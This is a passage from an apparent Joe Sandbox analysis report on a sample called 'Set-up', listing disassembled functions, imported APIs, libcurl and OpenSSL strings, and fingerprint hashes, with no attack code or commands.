                                • Opcode Fuzzy Hash: 6e318683829a1f7a67aaffcea65a83e7731aa0fc6ad9bdf6b15bfa8e3202b569
                                • Instruction Fuzzy Hash: 2EF015B08013208FD7009F19D508B42BFE4BF45314F06829DD4881F3A2DBB9C644CBE1
                                Function 00639010 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,006343F0,?,?,?,?,?,00633D71), ref: 00639021
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 34761678f78d0da677cb802dd2d401158160ce172d48f190059a3dc7a4052d5e
                                • Instruction ID: 6f4cb745901b6534dea14175a9a5a4a4ec6b227cb0f1afc8adc6d3db1b81ec55
                                • Opcode Fuzzy Hash: 34761678f78d0da677cb802dd2d401158160ce172d48f190059a3dc7a4052d5e
                                • Instruction Fuzzy Hash: 41D0A7719043044BCB007E6888C140A37947A65314FC006AEDD845B302D7395515C7D3
                                Function 002ECBC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,002C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,002C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002ECBD2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: bfb3341f09ba4ff69db34d5337b2ba120a6e880d5560880acd38e5e82a5c9f8d
                                • Instruction ID: 226bdfcf860679d71cba5d5b43b940f9baf88b2266a5acb4ad0ba7d42dede31e
                                • Opcode Fuzzy Hash: bfb3341f09ba4ff69db34d5337b2ba120a6e880d5560880acd38e5e82a5c9f8d
                                • Instruction Fuzzy Hash: CFB02B25440040C7D6010605F883C153103E241308BE0043CF101C04B0C2108C62D182

                                Non-executed Functions

                                Function 001862E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON
                                Download Yara Rule
                                APIs
                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00186E74
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00186F8A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00187184
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00187263
                                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 001875B8
                                  • Part of subcall function 002DF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 002DF8AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$memcmpmemsetstrcpystrlen
                                • String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
                                • API String ID: 838718518-248801092
                                • Opcode ID: 2f8de73968a2b9b2579eb7e3163c196c1d42e33f1651ec2a67ec680c9bf98304
                                • Instruction ID: bfb3d54867168795d8e602674f1a16abc4d1dac45a3818128d2f810e412aeedf
                                • Opcode Fuzzy Hash: 2f8de73968a2b9b2579eb7e3163c196c1d42e33f1651ec2a67ec680c9bf98304
                                • Instruction Fuzzy Hash: 4A0307B5908340ABE721BA10EC42F7B7799AF91708F094428FD4D56283F775EA64CB93
                                Function 0049E050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON
                                Download Yara Rule
                                APIs
                                • localeconv.MSVCRT ref: 0049E0B3
                                • localeconv.MSVCRT ref: 0049E0BE
                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0049E149
                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0049E179
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0049E1D8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0049E1FA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0049E20F
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0049F886
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$isspacelocaleconv$_errno
                                • String ID: $d$nil)
                                • API String ID: 577766270-394766432
                                • Opcode ID: b30ea4267f07cbf7ee465e624fc707087f7ec34612eb9e44faeeff50eae18c2d
                                • Instruction ID: 9ca0fd3a4a5b0c1f9054b48cc9dbf0e048eff32178e96d49ce84698fd07b07c6
                                • Opcode Fuzzy Hash: b30ea4267f07cbf7ee465e624fc707087f7ec34612eb9e44faeeff50eae18c2d
                                • Instruction Fuzzy Hash: A3137E706083418FDB20CF29C08462BBBE1BF99314F14497EE9959B361D779EC49CB86
                                Function 0015E480 Relevance: 91.8, APIs: 25, Strings: 27, Instructions: 803COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                • API String ID: 0-1921080684
                                • Opcode ID: 6821e164f81c7cbe51158a283be8719eb8a9fb95e1c5f63cec3da34024167d64
                                • Instruction ID: 5b2b8fbd56794c42e6c7de8418c3b60227e72ebec7873765c79f1d97e9a445e8
                                • Opcode Fuzzy Hash: 6821e164f81c7cbe51158a283be8719eb8a9fb95e1c5f63cec3da34024167d64
                                • Instruction Fuzzy Hash: 52521371A04300EBD7189F24DC45B7B7BE9AB94306F184829FDA5CB292E730DA49C792
                                Function 0011E620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON
                                Download Yara Rule
                                APIs
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0011E6F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: fputc
                                • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                • API String ID: 1992160199-2555271450
                                • Opcode ID: b036fc5d1c04b80570863bf7aca382fa9e727900946385b45f38577becb8ab06
                                • Instruction ID: fce8c9ff585a8d5a74b13cd558a3e159d229a522aac9486af76ac8dd7722631a
                                • Opcode Fuzzy Hash: b036fc5d1c04b80570863bf7aca382fa9e727900946385b45f38577becb8ab06
                                • Instruction Fuzzy Hash: 7E829371A083419FD718CE19C8847ABBBE1AFC5724F158A3DF8A997291D730DC86CB52
                                Function 00124940 Relevance: 25.2, APIs: 1, Strings: 13, Instructions: 731COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 001252A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: CounterPerformanceQueryfflush
                                • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                • API String ID: 1125614567-122532811
                                • Opcode ID: 9158793e268dab79055c7e10f465c977d828f7f6069e6ef2d99feb3757a075c1
                                • Instruction ID: bc9eb9152f2325da0a53b5ace29209b8ce168e1683c88b68a1730ec4c622d3ca
                                • Opcode Fuzzy Hash: 9158793e268dab79055c7e10f465c977d828f7f6069e6ef2d99feb3757a075c1
                                • Instruction Fuzzy Hash: 55420771B08710AFD708DE28DC81B6BB7E6EFD4704F05892CF54D97291E775A8248B92
                                Function 003A0170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 003A0374
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 003A0395
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 003A049D
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 003A04E7
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 003A055F
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 003A057A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 003A0618
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 003A06E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
                                • API String ID: 1297977491-3776850024
                                • Opcode ID: 9bb44be9d4e6151a96c3f3d4e5f304d3ebed9c4c9f2be3c7431884db70757633
                                • Instruction ID: 59a2a8c10ab7568dce04ff459c8b97d4cb33b694eeb81c0be410d42908325e2a
                                • Opcode Fuzzy Hash: 9bb44be9d4e6151a96c3f3d4e5f304d3ebed9c4c9f2be3c7431884db70757633
                                • Instruction Fuzzy Hash: 7152A2719187818BD715CF28D841BABB7E4EFDA348F048A2DF9C893252E775D904CB92
                                Function 002EE270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON
                                Download Yara Rule
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 002EE28D
                                • FindNextFileW.KERNEL32(?,00000000), ref: 002EE2BB
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 002EE30A
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 002EE3C7
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 002EE3DD
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 002EE3F8
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 002EE41A
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 002EE44E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 002EE563
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 002EE571
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
                                • String ID:
                                • API String ID: 1393009926-0
                                • Opcode ID: e6d80a3b3afc340fe8fd6b125e2467148ff9c9ea7b876429c30fbf6381220568
                                • Instruction ID: 082abbf6b9f57c5e76324f94a0d02b820f0a65b28230ce799a8300929b0b7b75
                                • Opcode Fuzzy Hash: e6d80a3b3afc340fe8fd6b125e2467148ff9c9ea7b876429c30fbf6381220568
                                • Instruction Fuzzy Hash: FD914730160B829FDB21CF39CC45B76BBA5FF85314F594669E9558B2E2E730E860CB50
                                Function 001CC900 Relevance: 18.4, APIs: 8, Strings: 4, Instructions: 368COMMON
                                Download Yara Rule
                                APIs
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 001CCC95
                                  • Part of subcall function 001CCDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 001CCEC8
                                  • Part of subcall function 001CCDF0: SetLastError.KERNEL32(00000002,00000000,001CCC27,00000004), ref: 001CD109
                                • SetLastError.KERNEL32(00000002), ref: 001CCDD0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLastmemchr
                                • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                • API String ID: 2208448350-3285806060
                                • Opcode ID: 9f3e890277f306e1f863931f5332e91cf730e1a7b30285e6e4f2fef1bee738ab
                                • Instruction ID: d0c1862bb7d8f1a1457e8eb264385af937cc44b63a82de7d5459314b1d4363dc
                                • Opcode Fuzzy Hash: 9f3e890277f306e1f863931f5332e91cf730e1a7b30285e6e4f2fef1bee738ab
                                • Instruction Fuzzy Hash: B6D1D7B2A083058BD7249E68C845B7ABBD1AFA1344F15493DF8CE97281EB74DD84D7C2
                                Function 002849F0 Relevance: 16.7, Strings: 13, Instructions: 421COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
